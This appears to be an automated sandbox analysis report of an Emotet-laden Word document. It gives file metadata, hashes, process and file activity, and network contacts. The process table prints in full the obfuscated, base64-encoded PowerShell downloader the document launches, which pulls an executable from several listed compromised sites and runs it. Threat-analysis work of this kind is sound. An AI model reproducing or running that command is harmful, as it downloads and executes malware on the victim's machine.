File name: | Adjunto 20191011_935041 |
Full analysis: | https://app.any.run/tasks/c4633c68-40b1-471c-a3b8-d3cab28a275e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 17:13:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: override, Subject: generating, Author: Marlee Wisozk, Keywords: Ergonomic Frozen Fish, Comments: Agent, Template: Normal.dotm, Last Saved By: Zachary Conroy, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 18:55:00 2019, Last Saved Time/Date: Fri Oct 11 18:55:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | 9640DFABAC0E79BFE712D5AFBB4A0698 |
SHA1: | FC9DF0457F03E8028CEFFA619B12474AA9034D99 |
SHA256: | 63DC2437711EFCDA287A3F7DD0E850AE6F7967A39358E4110D5272ECB61A8E4E |
SSDEEP: | 6144:K1T1CzL3KUzS4nLx3KOVoOdr1YiZVTZyOZ0p:K1T1CzL6UG4t3KOVoOD79yO |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | override |
---|---|
Subject: | generating |
Author: | Marlee Wisozk |
Keywords: | Ergonomic Frozen Fish |
Comments: | Agent |
Template: | Normal.dotm |
LastModifiedBy: | Zachary Conroy |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:11 17:55:00 |
ModifyDate: | 2019:10:11 17:55:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 169 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Cummings Inc |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 197 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Williamson |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2028 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Adjunto 20191011_935041.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3864 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADkAMgAwADAAMAAwADAANwAwADcAeAA9ACcAYwB4AHgAMgAyADgAYwAwADQANwBiACcAOwAkAGIAMABjAGMANwA5AGMAMAAxADQANQBjACAAPQAgACcAOAAxADgAJwA7ACQAYwA2ADgANgA4AHgANwA5AHgAMAAyAD0AJwBiADEAMwA3ADYAYwBjAHgAMQAzAGMAMAAnADsAJAB4ADAAYgA4ADcANAAwADQAMwAwAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIAMABjAGMANwA5AGMAMAAxADQANQBjACsAJwAuAGUAeABlACcAOwAkAGIAMgA5ADAAYgBjADkAYgBiAGMAeAA9ACcAYgBjADAAYgB4ADMAYgA2ADgAYgB4ADYAJwA7ACQAYgAzADMAYgA0ADEAOABjADEANwAyADAAMwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBDAGwAaQBlAE4AVAA7ACQAeAAyAHgANgA0ADAAMAAwADYAMAAyADgAMAA9ACcAaAB0AHQAcAA6AC8ALwBjAG8AbABvAHUAcgBwAG8AbAB5AG0AZQByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAzAGoAbwAxAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgBpAGwAbQBzAHQAbwBrAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB2AHQAMABmADMALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGMAaABvAG8AbABjAGwAdQBlAC4AYwBvAG0ALwA2ADYAZQBvAC8AeQBoAGYAbQB2ADQANQA4ADIALwAqAGgAdAB0AHAAOgAvAC8AcAByAGUAdwBlAG4AdABvAC4AYwBvAG0ALwBpAG0AYQBnAGUAdQBwAGwAbwBhAGQALwA3ADMAdQA1ADIANAA3AC8AKgBoAHQAdABwADoALwAvAGgAZQBwAHMAZQB2AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA2AHcAOAB6AHgANQAvACcALgAiAFMAcABsAGAAaQB0ACIAKAAnACoAJwApADsAJAB4ADcAYwA1ADkANAAwAGIANQAzAGMAYwA9ACcAYgBjAGMANgBjADgAOQAwADEAMgBjADUAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAYgAwADUAMQBiADcAOQA3ADAAOAA2ACAAaQBuACAAJAB4ADIAeAA2ADQAMAAwADAANgAwADIAOAAwACkAewB0AHIAeQB7ACQAYgAzADMAYgA0ADEAOABjADEANwAyADAAMwAuACIARABgAG8AdwBgAE4AbABPAGEAYABEAGYAaQBMAGUAIgAoACQAYgAwADUAMQBiADcAOQA3ADAAOAA2ACwAIAAkAHgAMABiADgANwA0ADAANAAzADAAYwApADsAJAB4ADkAMgA0ADUANwA1ADAAOQAzAHgAOAAzAD0AJwBjADAANwAyAHgANgAwADUANAB4ADAAMQAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHgAMABiADgANwA0ADAANAAzADAAYwApAC4AIgBMAGUAYABOAEcAYABUAEgAIgAgAC0AZwBlACAAMgA3ADAAOAA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAGEAcgBUACIAKAAkAHgAMABiADgANwA0ADAANAAzADAAYwApADsAJAB4ADEAYwAxADIANwAwADAAMgAyAHgAPQAnAHgAYgAwADQAMQA3ADIAMgAwADAAOAAyACcAOwBiAHIAZQBhAGsAOwAkAGMANAA3ADMAYwB4ADQAYgAwADYAYwA9ACcAeABiADIAMAB4ADMANQAyADIAYgA2ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAeAAyADMANQAwADAAMwAwADQAOQAwADAAPQAnAHgAMwA0ADEAMAA2ADEAYwA4ADAAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA199.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4BA902JSGWUQYM9NMQVT.temp | — | |
MD5:— | SHA256:— | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3077FBB.wmf | wmf | |
MD5:D2FDE7305DD549AE4C40F8AAD558A69F | SHA256:D8DD9356635CD36CC2A5F5A17D2519F46E442F3AAD3FD560F62C71C3A60480AE | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\347EE337.wmf | wmf | |
MD5:1A076950EE27D8944AE5C7D0B1BA874F | SHA256:5ECC860BF7F67E63FCD4ED0F872A8CF2EAC8E4D007C27E341AC49B0A02D2269B | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B3814A4A940758FA990B3B3C05A14453 | SHA256:531FEE7A1A7E8659C7E04F6A21C63EE6E71694B6FBE982CF7492EFCC81CC23B5 | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FDBEC81.wmf | wmf | |
MD5:54489F1104307CD59BA8E413466B212A | SHA256:E807ED2FA0BD12C9B04BDCDCF2A181240B9B7693887BEAC1EED2D704EFEA5BDB | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8ED725F9.wmf | wmf | |
MD5:8F1A83003A4C3A4848A5AA336A2F7538 | SHA256:D9BD83910B40DE2C96FA17920D0AD1D8E94B6373BFEF5BF508C37643DBF7BC9A | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Adjunto 20191011_935041.doc.LNK | lnk | |
MD5:F6D47FEF12DD6704FF5BD8E8615F6694 | SHA256:ECC7D1520033557465737BE378BAF45314A0EAD2F456D38FA2F114853B193616 | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\557F2073.wmf | wmf | |
MD5:2FAD4B96508C9E616B65A8C727CC122E | SHA256:0372F9455FDB48ED402C9EB5C6FD9014E54BAD064DDC2F4263929A4AC94833EE | |||
2028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E68D295D.wmf | wmf | |
MD5:01A085BD977A32593F4EFEDEB1994A2F | SHA256:85B95AC14C258647A3EF983B94BFA56117D40CD3BB8907EAA901692E56754F4C |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3864 | powershell.exe | 188.40.100.212:80 | colourpolymer.com | Hetzner Online GmbH | DE | suspicious |
3864 | powershell.exe | 50.62.57.143:80 | www.filmstokk.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
colourpolymer.com |
| suspicious |
www.filmstokk.com |
| suspicious |